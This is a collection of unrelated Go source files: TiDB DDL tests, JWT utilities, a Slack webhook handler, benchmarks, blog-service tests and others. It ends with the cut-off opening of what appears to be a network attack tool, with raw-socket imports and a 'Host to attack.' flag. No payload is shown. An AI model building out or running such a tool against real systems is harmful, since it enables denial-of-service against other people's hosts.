	tk.MustExec("alter table t1 modify column b bigint as (a+1) stored;")
	tk.MustExec("alter table t1 modify column b bigint as (a + 1) stored;")
	tk.MustQuery("select * from t1").Check(testkit.Rows("1 2"))
	// Modify column with index to the same expression.
	tk.MustExec("drop table t1;")
	tk.MustExec("create table t1 (a int, b int as (a+1), index idx(b));")
	tk.MustExec("insert into t1 set a=1;")
	tk.MustExec("alter table t1 modify column b bigint as (a+1);")
	tk.MustExec("alter table t1 modify column b bigint as (a + 1);")
	tk.MustQuery("select * from t1").Check(testkit.Rows("1 2"))
	// Modify column from non-generated to stored generated.
	tk.MustExec("drop table t1;")
	tk.MustExec("create table t1 (a int, b int);")
	tk.MustGetErrMsg("alter table t1 modify column b bigint as (a+1) stored;", modStoredColErrMsg)
	// Modify column from stored generated to non-generated.
	// The stored value (2) is kept as the plain column's data.
	tk.MustExec("drop table t1;")
	tk.MustExec("create table t1 (a int, b int as (a+1) stored);")
	tk.MustExec("insert into t1 set a=1;")
	tk.MustExec("alter table t1 modify column b int;")
	tk.MustQuery("select * from t1").Check(testkit.Rows("1 2"))
}
// TestCheckColumnDefaultValue checks that TEXT/BLOB/JSON columns reject an
// explicit DEFAULT under strict SQL mode, and how defaults are normalized
// once sql_mode is cleared: the empty default is dropped entirely for
// text/blob, while json stores the literal default "null".
func TestCheckColumnDefaultValue(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	// Under the default (strict) sql_mode all of these are rejected.
	tk.MustExec("drop table if exists text_default_text;")
	tk.MustGetErrCode("create table text_default_text(c1 text not null default '');", errno.ErrBlobCantHaveDefault)
	tk.MustGetErrCode("create table text_default_text(c1 text not null default 'scds');", errno.ErrBlobCantHaveDefault)
	tk.MustExec("drop table if exists text_default_json;")
	tk.MustGetErrCode("create table text_default_json(c1 json not null default '');", errno.ErrBlobCantHaveDefault)
	tk.MustGetErrCode("create table text_default_json(c1 json not null default 'dfew555');", errno.ErrBlobCantHaveDefault)
	tk.MustExec("drop table if exists text_default_blob;")
	tk.MustGetErrCode("create table text_default_blob(c1 blob not null default '');", errno.ErrBlobCantHaveDefault)
	tk.MustGetErrCode("create table text_default_blob(c1 blob not null default 'scds54');", errno.ErrBlobCantHaveDefault)
	// With sql_mode cleared the statements succeed but the defaults are
	// normalized rather than stored verbatim.
	tk.MustExec("set sql_mode='';")
	tk.MustExec("create table text_default_text(c1 text not null default '');")
	tk.MustQuery(`show create table text_default_text`).Check(testkit.RowsWithSep("|",
		"text_default_text CREATE TABLE `text_default_text` (\n"+
			"  `c1` text NOT NULL\n"+
			") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
	))
	is := domain.GetDomain(tk.Session()).InfoSchema()
	tblInfo, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("text_default_text"))
	require.NoError(t, err)
	// The empty text default is not persisted in the table metadata.
	require.Empty(t, tblInfo.Meta().Columns[0].DefaultValue)
	tk.MustExec("create table text_default_blob(c1 blob not null default '');")
	tk.MustQuery(`show create table text_default_blob`).Check(testkit.RowsWithSep("|",
		"text_default_blob CREATE TABLE `text_default_blob` (\n"+
			"  `c1` blob NOT NULL\n"+
			") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
	))
	is = domain.GetDomain(tk.Session()).InfoSchema()
	tblInfo, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("text_default_blob"))
	require.NoError(t, err)
	require.Empty(t, tblInfo.Meta().Columns[0].DefaultValue)
	tk.MustExec("create table text_default_json(c1 json not null default '');")
	tk.MustQuery(`show create table text_default_json`).Check(testkit.RowsWithSep("|",
		"text_default_json CREATE TABLE `text_default_json` (\n"+
			"  `c1` json NOT NULL DEFAULT 'null'\n"+
			") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
	))
	is = domain.GetDomain(tk.Session()).InfoSchema()
	tblInfo, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("text_default_json"))
	require.NoError(t, err)
	// For JSON the empty default is rewritten to the JSON literal "null".
	require.Equal(t, "null", tblInfo.Meta().Columns[0].DefaultValue)
}
// TestCheckConvertToCharacter verifies that converting a binary-charset
// varchar column to any character charset (utf8/utf8mb4/latin1) is rejected.
func TestCheckConvertToCharacter(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	tk.MustExec("create table t(a varchar(10) charset binary);")
	// The table handle is captured before the alters; since every alter
	// below fails, the schema it reflects stays valid.
	is := domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("t"))
	require.NoError(t, err)
	tk.MustGetErrCode("alter table t modify column a varchar(10) charset utf8 collate utf8_bin", errno.ErrUnsupportedDDLOperation)
	tk.MustGetErrCode("alter table t modify column a varchar(10) charset utf8mb4 collate utf8mb4_bin", errno.ErrUnsupportedDDLOperation)
	tk.MustGetErrCode("alter table t modify column a varchar(10) charset latin1 collate latin1_bin", errno.ErrUnsupportedDDLOperation)
	// The column must keep its original binary charset.
	require.Equal(t, "binary", tbl.Cols()[0].GetCharset())
}
// TestAddMultiColumnsIndex builds a composite index over (a, b) where some
// rows have NULL in b, then validates data/index consistency via admin check.
func TestAddMultiColumnsIndex(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("drop database if exists tidb;")
	tk.MustExec("create database tidb;")
	tk.MustExec("use tidb;")
	tk.MustExec("create table tidb.test (a int auto_increment primary key, b int);")
	tk.MustExec("insert tidb.test values (1, 1);")
	tk.MustExec("update tidb.test set b = b + 1 where a = 1;")
	tk.MustExec("insert into tidb.test values (2, 2);")
	// Test that the b value is nil.
	tk.MustExec("insert into tidb.test (a) values (3);")
	tk.MustExec("insert into tidb.test values (4, 4);")
	// Test that the b value is nil again.
	tk.MustExec("insert into tidb.test (a) values (5);")
	tk.MustExec("insert tidb.test values (6, 6);")
	// The index build must handle the NULL entries in b.
	tk.MustExec("alter table tidb.test add index idx1 (a, b);")
	tk.MustExec("admin check table test")
}
// For issue #31735.
// TestAddGeneratedColumnAndInsert issues INSERT ... ON DUPLICATE KEY UPDATE
// and REPLACE from a second session while `ADD COLUMN ... AS (...)` walks
// through the delete-only, write-only, and write-reorganization states.
func TestAddGeneratedColumnAndInsert(t *testing.T) {
	store, dom := testkit.CreateMockStoreAndDomainWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	// Note: "kye" is just the (misspelled) index name, not a keyword.
	tk.MustExec("create table t1 (a int, unique kye(a))")
	tk.MustExec("insert into t1 value (1), (10)")
	tk1 := testkit.NewTestKit(t, store)
	tk1.MustExec("use test")
	d := dom.DDL()
	hook := &callback.TestDDLCallback{Do: dom}
	ctx := mock.NewContext()
	ctx.Store = store
	times := 0
	var checkErr error
	onJobUpdatedExportedFunc := func(job *model.Job) {
		// Keep only the first failure.
		if checkErr != nil {
			return
		}
		switch job.SchemaState {
		case model.StateDeleteOnly:
			// Row 1 exists -> the upsert bumps a to 2; then replace 2.
			_, checkErr = tk1.Exec("insert into t1 values (1) on duplicate key update a=a+1")
			if checkErr == nil {
				_, checkErr = tk1.Exec("replace into t1 values (2)")
			}
		case model.StateWriteOnly:
			_, checkErr = tk1.Exec("insert into t1 values (2) on duplicate key update a=a+1")
			if checkErr == nil {
				_, checkErr = tk1.Exec("replace into t1 values (3)")
			}
		case model.StateWriteReorganization:
			// Reorg can fire repeatedly; `times` ensures the DML runs once.
			if checkErr == nil && job.SchemaState == model.StateWriteReorganization && times == 0 {
				_, checkErr = tk1.Exec("insert into t1 values (3) on duplicate key update a=a+1")
				if checkErr == nil {
					_, checkErr = tk1.Exec("replace into t1 values (4)")
				}
				times++
			}
		}
	}
	hook.OnJobUpdatedExported.Store(&onJobUpdatedExportedFunc)
	d.SetHook(hook)
	tk.MustExec("alter table t1 add column gc int as ((a+1))")
	// Final data reflects every hook mutation plus the generated column.
	tk.MustQuery("select * from t1 order by a").Check(testkit.Rows("4 5", "10 11"))
	require.NoError(t, checkErr)
}
// TestColumnTypeChangeGenUniqueChangingName checks that the temporary
// "changing" column/index created by a lossy MODIFY/CHANGE COLUMN gets a
// unique generated name (_col$_<name>_<n> / _idx$_<name>_<n>) even when a
// user column or index already occupies the default generated name.
func TestColumnTypeChangeGenUniqueChangingName(t *testing.T) {
	store, dom := testkit.CreateMockStoreAndDomainWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	hook := &callback.TestDDLCallback{}
	var checkErr error
	// Because `_col$_c2` / `_idx$_idx` exist, the suffix bumps to _0.
	assertChangingColName := "_col$_c2_0"
	assertChangingIdxName := "_idx$_idx_0"
	onJobUpdatedExportedFunc := func(job *model.Job) {
		if job.SchemaState == model.StateDeleteOnly && job.Type == model.ActionModifyColumn {
			// These must match the argument order the DDL job encodes.
			var (
				newCol                *model.ColumnInfo
				oldColName            *model.CIStr
				modifyColumnTp        byte
				updatedAutoRandomBits uint64
				changingCol           *model.ColumnInfo
				changingIdxs          []*model.IndexInfo
			)
			pos := &ast.ColumnPosition{}
			err := job.DecodeArgs(&newCol, &oldColName, pos, &modifyColumnTp, &updatedAutoRandomBits, &changingCol, &changingIdxs)
			if err != nil {
				checkErr = err
				return
			}
			if changingCol.Name.L != assertChangingColName {
				checkErr = errors.New("changing column name is incorrect")
			} else if changingIdxs[0].Name.L != assertChangingIdxName {
				checkErr = errors.New("changing index name is incorrect")
			}
		}
	}
	hook.OnJobUpdatedExported.Store(&onJobUpdatedExportedFunc)
	d := dom.DDL()
	d.SetHook(hook)
	tk.MustExec("create table if not exists t(c1 varchar(256), c2 bigint, `_col$_c2` varchar(10), unique _idx$_idx(c1), unique idx(c2));")
	tk.MustExec("alter table test.t change column c2 cC2 tinyint after `_col$_c2`")
	require.NoError(t, checkErr)
	// Verify the final column/index layout after the change + reposition.
	tbl := external.GetTableByName(t, tk, "test", "t")
	require.Len(t, tbl.Meta().Columns, 3)
	require.Equal(t, "c1", tbl.Meta().Columns[0].Name.O)
	require.Equal(t, 0, tbl.Meta().Columns[0].Offset)
	require.Equal(t, "_col$_c2", tbl.Meta().Columns[1].Name.O)
	require.Equal(t, 1, tbl.Meta().Columns[1].Offset)
	require.Equal(t, "cC2", tbl.Meta().Columns[2].Name.O)
	require.Equal(t, 2, tbl.Meta().Columns[2].Offset)
	require.Len(t, tbl.Meta().Indices, 2)
	require.Equal(t, "_idx$_idx", tbl.Meta().Indices[0].Name.O)
	require.Equal(t, "idx", tbl.Meta().Indices[1].Name.O)
	require.Len(t, tbl.Meta().Indices[0].Columns, 1)
	require.Equal(t, "c1", tbl.Meta().Indices[0].Columns[0].Name.O)
	require.Equal(t, 0, tbl.Meta().Indices[0].Columns[0].Offset)
	require.Len(t, tbl.Meta().Indices[1].Columns, 1)
	require.Equal(t, "cC2", tbl.Meta().Indices[1].Columns[0].Name.O)
	require.Equal(t, 2, tbl.Meta().Indices[1].Columns[0].Offset)
	// Second scenario: the column being modified is itself a generated-style
	// name, so the changing name must nest and bump the numeric suffix.
	assertChangingColName1 := "_col$__col$_c1_1"
	assertChangingColName2 := "_col$__col$__col$_c1_0_1"
	query1 := "alter table t modify column _col$_c1 tinyint"
	query2 := "alter table t modify column _col$__col$_c1_0 tinyint"
	onJobUpdatedExportedFunc2 := func(job *model.Job) {
		if (job.Query == query1 || job.Query == query2) && job.SchemaState == model.StateDeleteOnly && job.Type == model.ActionModifyColumn {
			var (
				newCol                *model.ColumnInfo
				oldColName            *model.CIStr
				modifyColumnTp        byte
				updatedAutoRandomBits uint64
				changingCol           *model.ColumnInfo
				changingIdxs          []*model.IndexInfo
			)
			pos := &ast.ColumnPosition{}
			err := job.DecodeArgs(&newCol, &oldColName, pos, &modifyColumnTp, &updatedAutoRandomBits, &changingCol, &changingIdxs)
			if err != nil {
				checkErr = err
				return
			}
			if job.Query == query1 && changingCol.Name.L != assertChangingColName1 {
				checkErr = errors.New("changing column name is incorrect")
			}
			if job.Query == query2 && changingCol.Name.L != assertChangingColName2 {
				checkErr = errors.New("changing column name is incorrect")
			}
		}
	}
	hook.OnJobUpdatedExported.Store(&onJobUpdatedExportedFunc2)
	d.SetHook(hook)
	tk.MustExec("drop table if exists t")
	tk.MustExec("create table if not exists t(c1 bigint, _col$_c1 bigint, _col$__col$_c1_0 bigint, _col$__col$__col$_c1_0_0 bigint)")
	tk.MustExec("alter table t modify column c1 tinyint")
	tk.MustExec("alter table t modify column _col$_c1 tinyint")
	require.NoError(t, checkErr)
	tk.MustExec("alter table t modify column _col$__col$_c1_0 tinyint")
	require.NoError(t, checkErr)
	tk.MustExec("alter table t change column _col$__col$__col$_c1_0_0 _col$__col$__col$_c1_0_0 tinyint")
	// All four columns keep their names and end up as tinyint.
	tbl = external.GetTableByName(t, tk, "test", "t")
	require.Len(t, tbl.Meta().Columns, 4)
	require.Equal(t, "c1", tbl.Meta().Columns[0].Name.O)
	require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[0].GetType())
	require.Equal(t, 0, tbl.Meta().Columns[0].Offset)
	require.Equal(t, "_col$_c1", tbl.Meta().Columns[1].Name.O)
	require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[1].GetType())
	require.Equal(t, 1, tbl.Meta().Columns[1].Offset)
	require.Equal(t, "_col$__col$_c1_0", tbl.Meta().Columns[2].Name.O)
	require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[2].GetType())
	require.Equal(t, 2, tbl.Meta().Columns[2].Offset)
	require.Equal(t, "_col$__col$__col$_c1_0_0", tbl.Meta().Columns[3].Name.O)
	require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[3].GetType())
	require.Equal(t, 3, tbl.Meta().Columns[3].Offset)
	tk.MustExec("drop table if exists t")
}
|
package main
import (
"C"
"bytes"
"encoding/base64"
"image/png"
"github.com/dchest/captcha"
)
// NewCaptcha renders a captcha image for the digits contained in _data and
// returns it as a base64-encoded PNG in a newly allocated C string (the C
// caller owns and must free it).
//
// identifier is forwarded to the captcha library; width and height are the
// image dimensions in pixels. Non-digit characters in _data are ignored.
// Returns nil if the PNG encoding fails.
//
//export NewCaptcha
func NewCaptcha(identifier, _data *C.char, width, height C.int) *C.char {
	data := C.GoString(_data)
	var numbers []byte
	for _, c := range data {
		// Keep only ASCII digits, converted to their numeric values 0-9.
		if c >= '0' && c <= '9' {
			numbers = append(numbers, byte(c-'0'))
		}
	}
	img := captcha.NewImage(C.GoString(identifier), numbers, int(width), int(height))
	var buf bytes.Buffer
	// The encode error was previously ignored, which could hand a
	// truncated/corrupt base64 payload to the C caller.
	if err := png.Encode(&buf, img); err != nil {
		return nil
	}
	return C.CString(base64.StdEncoding.EncodeToString(buf.Bytes()))
}
// main is intentionally empty; it is required so this package can be built
// as a C library (presumably via -buildmode=c-shared/c-archive) exposing the
// exported functions above. NOTE(review): confirm the build mode used.
func main() {}
|
package utils
import (
"fmt"
"time"
"github.com/dgrijalva/jwt-go"
)
// mySigningKey is the HMAC secret used to sign and verify JWTs.
// NOTE(review): both values are resolved via GetConf() at package
// initialization time, so configuration must be loadable before this
// package is first imported.
var mySigningKey = []byte(GetConf().JWTKey)

// jwtExpireIn is the token lifetime in seconds (added to the IssuedAt
// Unix timestamp to form ExpiresAt).
var jwtExpireIn = GetConf().JWTExpireIn
// SignToken creates an HS256-signed JWT for the given audience, used for
// login sessions.
//
// The token is issued now, expires jwtExpireIn seconds later, and carries
// the fixed issuer "MoonCakeDuty". It returns the compact serialized token
// or the signing error.
func SignToken(audience string) (string, error) {
	// Capture the timestamp once so IssuedAt and ExpiresAt are derived from
	// the same instant; the original called time.Now() twice, which could
	// straddle a second boundary and skew the effective lifetime.
	now := time.Now().Unix()
	claims := jwt.StandardClaims{
		Audience:  audience,
		IssuedAt:  now,
		ExpiresAt: now + jwtExpireIn,
		Issuer:    "MoonCakeDuty",
	}
	token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
	tokenString, err := token.SignedString(mySigningKey)
	return tokenString, err
}
// VerifyToken parses and validates an HMAC-signed token string and returns
// its standard claims.
//
// If skipExpirationVerify is true, a token whose only validation failure is
// expiry is still accepted and its claims returned. Any other validation
// failure, a non-HMAC signing method, or an otherwise invalid token yields
// an error.
func VerifyToken(tokenString string, skipExpirationVerify bool) (*jwt.StandardClaims, error) {
	token, err := jwt.ParseWithClaims(tokenString, &jwt.StandardClaims{}, func(tk *jwt.Token) (interface{}, error) {
		// Don't forget to validate the alg is what you expect:
		// rejecting non-HMAC methods prevents algorithm-substitution
		// attacks (e.g. a token claiming alg=none or RS256).
		if _, ok := tk.Method.(*jwt.SigningMethodHMAC); !ok {
			return nil, fmt.Errorf("Unexpected signing method: %v", tk.Header["alg"])
		}
		return mySigningKey, nil
	})
	if err != nil {
		e, ok := err.(*jwt.ValidationError)
		if !ok {
			return nil, err
		}
		// e.Errors is a bit set; this case matches only when expiry is the
		// sole failed check.
		switch e.Errors {
		case jwt.ValidationErrorExpired:
			if skipExpirationVerify {
				if claims, ok := token.Claims.(*jwt.StandardClaims); ok {
					return claims, nil
				}
				// Claims were not StandardClaims: fall out of the switch to
				// the final validity check below, which will reject.
				break
			}
			fallthrough
		default:
			return nil, e
		}
	}
	if claims, ok := token.Claims.(*jwt.StandardClaims); ok && token.Valid {
		return claims, nil
	}
	return nil, fmt.Errorf("Token %s is invalid", tokenString)
}
|
package handler
import (
"fmt"
"net/http"
"github.com/naoty/slack-thread-webhook/datastore"
"github.com/naoty/slack-thread-webhook/handler/wrapper"
"github.com/nlopes/slack"
)
// Post is an http.Handler that posts incoming messages to Slack, threading
// messages that share the same request id.
type Post struct {
	// Channel is the Slack channel messages are posted to.
	Channel string
	// Datastore maps a message id to the Slack timestamp of the thread's
	// root message.
	Datastore datastore.Client
	// Slack is the API client used to post messages.
	Slack *slack.Client
}
// ServeHTTP posts the prepared message to the configured Slack channel. The
// first message seen for a given id starts a new top-level message and
// records its timestamp; subsequent messages with the same id are posted as
// replies in that thread. Responds 201 on success, 500 on any failure.
func (handler Post) ServeHTTP(w http.ResponseWriter, req *http.Request) {
	// Both context values are installed by the wrapper middleware; these
	// type assertions panic if the handler is mounted without it.
	messageParams := req.Context().Value(wrapper.PostMessageParametersKey).(slack.PostMessageParameters)
	requestParams := req.Context().Value(wrapper.ParametersKey).(map[string]string)
	id := requestParams["id"]
	// NOTE(review): the datastore error is discarded — a lookup failure is
	// indistinguishable from "no thread yet" and silently starts a new
	// thread. Confirm this best-effort behavior is intended.
	value, _ := handler.Datastore.Get(id)
	if value == "" {
		// No thread recorded for this id: post a top-level message and
		// remember its timestamp so later posts can reply to it.
		_, ts, err := handler.Slack.PostMessage(handler.Channel, "", messageParams)
		if err != nil {
			message := fmt.Sprintf("failed to post a message to slack: %v\n", err)
			http.Error(w, message, http.StatusInternalServerError)
			return
		}
		err = handler.Datastore.Set(id, ts)
		if err != nil {
			message := fmt.Sprintf("failed to set id: %v\n", err)
			http.Error(w, message, http.StatusInternalServerError)
			return
		}
	} else {
		// Reply inside the existing thread.
		messageParams.ThreadTimestamp = value
		_, _, err := handler.Slack.PostMessage(handler.Channel, "", messageParams)
		if err != nil {
			message := fmt.Sprintf("failed to post a message to slack: %v\n", err)
			http.Error(w, message, http.StatusInternalServerError)
			return
		}
	}
	w.WriteHeader(http.StatusCreated)
}
|
package main
import(
"emulator"
"iop_dma"
)
// Voice holds the per-channel state of a single SPU voice.
// NOTE(review): field meanings are inferred from their names — confirm
// against the SPU register documentation.
type Voice struct {
	left_vol, right_vol uint16
	pitch               uint16
	adsr1, adsr2        uint16
	current_envelope    uint16
	start_addr          uint32
	current_addr        uint32
	loop_addr           uint32
	loop_addr_specified bool
	counter             uint32
	block_pos           int
	loop_code           int
}

// reset returns the voice to its zero state.
func (v *Voice) reset() {
	// Assigning the zero value clears every field in one statement and,
	// unlike the previous field-by-field version, stays correct if fields
	// are added to Voice later.
	*v = Voice{}
}
// SPU_STAT models SPU status flags related to DMA transfers.
// NOTE(review): flag semantics are inferred from the field names — confirm
// against the SPU hardware documentation.
type SPU_STAT struct {
	DMA_finished bool
	DMA_busy     bool
}

// id is package-level state; its role is not visible in this part of the
// file. NOTE(review): document its purpose where it is assigned.
var id int
package pie
import (
"math/rand"
"testing"
)
// Median benchmarks at three input sizes, all delegating to
// benchmarkIntMedian below.
func BenchmarkIntMedianSmall(b *testing.B)  { benchmarkIntMedian(b, 20) }
func BenchmarkIntMedianMedium(b *testing.B) { benchmarkIntMedian(b, 800) }
func BenchmarkIntMedianLarge(b *testing.B)  { benchmarkIntMedian(b, 1000000) }
// benchmarkIntMedian measures Ints.Median on a deterministic pseudo-random
// slice of the given size, containing both signs and duplicates.
func benchmarkIntMedian(b *testing.B, size int) {
	// Fixed seed keeps the input identical across runs.
	rand.Seed(123)
	values := make(Ints, size)
	for i := 0; i < size; i++ {
		// Values spread over [-size/2, size/2): variety plus duplicates.
		values[i] = -size/2 + rand.Intn(size)
	}
	b.ResetTimer()
	for n := 0; n < b.N; n++ {
		// Accumulate into the package-level sink so the call is not
		// optimized away.
		sinkInts += values.Median()
	}
}
// Prevent compiler from aggressively optimizing away the result
var sinkInts int
|
// Copyright (c) 2019 Leonardo Faoro. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package ascon wraps the Ascon encryption algorithm.
//
// ref: https://ascon.iaik.tugraz.at/specification.html
package ascon
|
package state
// Package-level status flags, all false until toggled by the application.
// NOTE(review): the names suggest liveness/readiness/drain signaling for
// health-check endpoints — confirm the semantics at the call sites.
var Health = false
var Ready = false
var Drain = false
|
package main
import "errors"
// Sentinel error values shared across the application's auth, user, and
// product flows.
//
// NOTE(review): Go convention names sentinel errors ErrXxx (e.g.
// ErrBadRequest) with lowercase messages; renaming now would break existing
// callers and any message-based matching, so the current identifiers and
// strings are kept as-is.
var BadRequestError = errors.New("Bad_Request_Error")
var InvalidEmailOrPassword = errors.New("Invalid_Email_Or_Password")
var InvalidEmail = errors.New("Invalid_Email")
var IncorrectPassword = errors.New("Incorrect_Password")
var EmptyRows = errors.New("Empty_Rows")
var ViolateUNEmail = errors.New("Violate_UN_Email")
var ViolateUNUsername = errors.New("Violate_UN_Username")
var AddFavProductError = errors.New("Add_Fav_Product_Error")
var RemoveFavProductError = errors.New("Remove_Fav_Product_Error")
var EmptyFavProductList = errors.New("Empty_Fav_Product_List")
var VerifyEmailError = errors.New("Verify_Email_Error")
var IncorrectNewPasswordFormat = errors.New("Incorrect_New_Password_Format")
var PasswordMatchingIssue = errors.New("Password_Matching_Issue")
var WeakPassword = errors.New("Weak_Password")
var ResetPasswordError = errors.New("Reset_Password_Error")
var SameResetPwInput = errors.New("Same_Reset_Password_Input")
var RequestResetPassTokenError = errors.New("Request_Reset_Pass_Token_Error")
var DbQueryError = errors.New("DB_Query_Error")
var SignupError = errors.New("Signup_Error")
var UserVerificationError = errors.New("User_Verification_Error")
var JSONParseError = errors.New("JSON_Parse_Error")
var AddProductError = errors.New("Add_Product_Error")
|
package blog
import (
"fmt"
"testing"
"time"
// goblin
. "github.com/franela/goblin"
"github.com/jinzhu/gorm"
_ "github.com/jinzhu/gorm/dialects/sqlite"
)
func Test_Articles(t *testing.T) {
g := Goblin(t)
g.Describe("Service: Blog", func() {
var blog *BlogService
var db *gorm.DB
g.Before(func() {
db, _ = gorm.Open("sqlite3", ":memory:")
blog = NewService(db)
g.Assert(blog.Init()).Eql(nil)
})
g.Describe("Article()", func() {
g.It("should create an article", func() {
var expTitle = "EXAMPLE TITLE"
var expContent = "example content"
var expStatus = Published
var expPermission = Private
newPost, err := blog.CreatePost(expTitle, expContent, expStatus, expPermission)
g.Assert(err == nil).Equal(true)
var expArticle Article
err2 := db.Find(&expArticle, "id = ?", 1).Error
g.Assert(err2).Equal(nil)
// check actual data in db
g.Assert(expTitle).Equal(expArticle.Title)
g.Assert(expContent).Equal(expArticle.Content)
g.Assert(expPermission).Equal(expArticle.Permission)
g.Assert(expStatus).Equal(expArticle.Status)
// find event log
var expLog ArticleEventLog
err3 := db.Find(&expLog, "id = ?", newPost.ID).Error
g.Assert(err3).Equal(nil)
g.Assert(expLog.ArticleID).Equal(uint32(1))
g.Assert(expLog.ArticleEvent).Equal(PublishPost)
g.Assert(expLog.NewStatus).Equal(Published)
g.Assert(expLog.NewPermission).Equal(Private)
})
g.It("should create article failed /validation error", func() {
// set validation to a known value
var oldValidation = blog.Validations
blog.SetValidations(BlogValidations{
MaxTitleChars: 5,
MaxArticleChars: 10,
})
// vialation 1# size too long
_, err1 := blog.CreatePost("LONG_TITLE", "233", Published, Private)
g.Assert(err1 != nil).Equal(true)
// 1.1
_, err11 := blog.CreatePost("", "233", Published, Private)
g.Assert(err11 != nil).Equal(true)
// 2
_, err2 := blog.CreatePost("f", "HAS_A_ANOTHER_LONG_TIME", Published, Private)
g.Assert(err2 != nil).Equal(true)
// 3
_, err3 := blog.CreatePost("f", "g", Removed, Private)
g.Assert(err3 != nil).Equal(true)
blog.SetValidations(oldValidation)
})
g.It("should delete post", func() {
// create another new post
newPost, errC := blog.CreatePost("T", "G", Published, Private)
g.Assert(errC == nil).Equal(true)
// get ID
errD := blog.DeletePost(newPost.ID)
g.Assert(errD == nil).Equal(true)
// find post
var delPost Article
errF := db.Find(&delPost, "id = ?", newPost.ID).Error
g.Assert(errF == nil).Equal(true)
// Notice: It's not actually deleted from DB
// Just make the status as "Removed"
g.Assert(delPost.Status).Equal(Removed)
// TODO: add event
})
g.It("should publish a drafted post", func() {
newPost, errC := blog.CreatePost("T", "R", Drafted, Private)
g.Assert(errC == nil).Equal(true)
// getID
_, errD := blog.PublishPost(newPost.ID)
g.Assert(errD == nil).Equal(true)
// find post
var pubPost Article
errF := db.Find(&pubPost, "id = ?", newPost.ID).Error
g.Assert(errF == nil).Eql(true)
g.Assert(pubPost.Status).Eql(Published)
})
g.It("should throw error on publish a non-draft post", func() {
newPost, errC := blog.CreatePost("T", "R", Published, Private)
// throw error because it has already published
g.Assert(errC == nil).Equal(true)
// publish post
_, errD := blog.PublishPost(newPost.ID)
g.Assert(errD == nil).Eql(false)
})
g.It("should find all posts with newly created", func() {
errDA := db.Delete(Article{}).Error
g.Assert(errDA == nil).Eql(true)
for i := range []int{1, 2, 3} {
blog.CreatePost(string(i), "B", Published, Private)
}
_, articles, errL := blog.ListAllPostsByPage(nil, nil)
g.Assert(errL == nil).Eql(true)
g.Assert(len(articles)).Equal(3)
})
g.It("should get one post", func() {
newPost, errC := blog.CreatePost("R", "S", Published, Public)
g.Assert(errC == nil).Eql(true)
post, errG := blog.GetOnePost(newPost.ID)
g.Assert(errG == nil).Eql(true)
g.Assert(post.ID).Eql(newPost.ID)
g.Assert(post.Status).Equal(newPost.Status)
g.Assert(post.CreatedAt.UnixNano()).Equal(newPost.CreatedAt.UnixNano())
})
})
g.Describe("Get Articles by Filter", func() {
g.Before(func() {
// clear all data
db.Exec("delete from articles")
// insert fixtures
p := Public
s := Published
for i := 0; i < 12; i++ {
// so there will be 6 private posts
if i%2 == 0 {
p = Private
}
switch i % 3 {
case 0:
s = Published
case 1:
s = Drafted
case 2:
default:
s = Removed
}
db.Create(&Article{
Title: fmt.Sprintf("Title-%d", i),
Content: "content",
Permission: p,
Status: s,
})
time.Sleep(10 * time.Millisecond)
}
})
g.After(func() {
db.Exec("delete from articles")
})
g.It("should load all posts", func() {
db := blog.DB
posts, err := listPostsWithFilters(db, nil, nil, nil)
g.Assert(err == nil).Equal(true)
g.Assert(len(posts)).Equal(12)
})
g.It("should work /status = PUBLISHED", func() {
db := blog.DB
p := Published
filter := ArticleFilter{
Status: &p,
Permission: nil,
}
posts, err := listPostsWithFilters(db, &filter, nil, nil)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Eql(4)
})
g.It("should work /limit = 2", func() {
filter := ArticlePageLimit{
Offset: 0,
Limit: 2,
}
posts, err := listPostsWithFilters(db, nil, &filter, nil)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Eql(2)
})
g.It("should work /offset = 7", func() {
filter := ArticlePageLimit{
Offset: 7,
Limit: 10,
}
posts, err := listPostsWithFilters(db, nil, &filter, nil)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Eql(5)
})
g.It("should work /createdAt desc", func() {
s := "desc"
filter := ArticleOrder{
UpdatedAt: nil,
CreatedAt: &s,
}
posts, err := listPostsWithFilters(db, nil, nil, &filter)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Equal(12)
lastPost := posts[0]
for i := 1; i < len(posts); i++ {
before := posts[i].CreatedAt.Before(lastPost.CreatedAt)
lastPost = posts[i]
g.Assert(before).Equal(true)
}
})
g.It("should work /createdAt asc", func() {
s := "asc"
filter := ArticleOrder{
UpdatedAt: nil,
CreatedAt: &s,
}
posts, err := listPostsWithFilters(db, nil, nil, &filter)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Equal(12)
lastPost := posts[0]
for i := 1; i < len(posts); i++ {
after := posts[i].CreatedAt.After(lastPost.CreatedAt)
lastPost = posts[i]
g.Assert(after).Equal(true)
}
})
// TODO: more testcases
})
})
}
|
package main
import (
"bytes"
"encoding/binary"
"flag"
"fmt"
"log"
"math/rand"
"net"
"strconv"
"syscall"
)
// argParser defines and parses the -host and -port command-line flags and
// returns their values.
func argParser() (string, int) {
	var (
		host = flag.String("host", "", "Host to attack.")
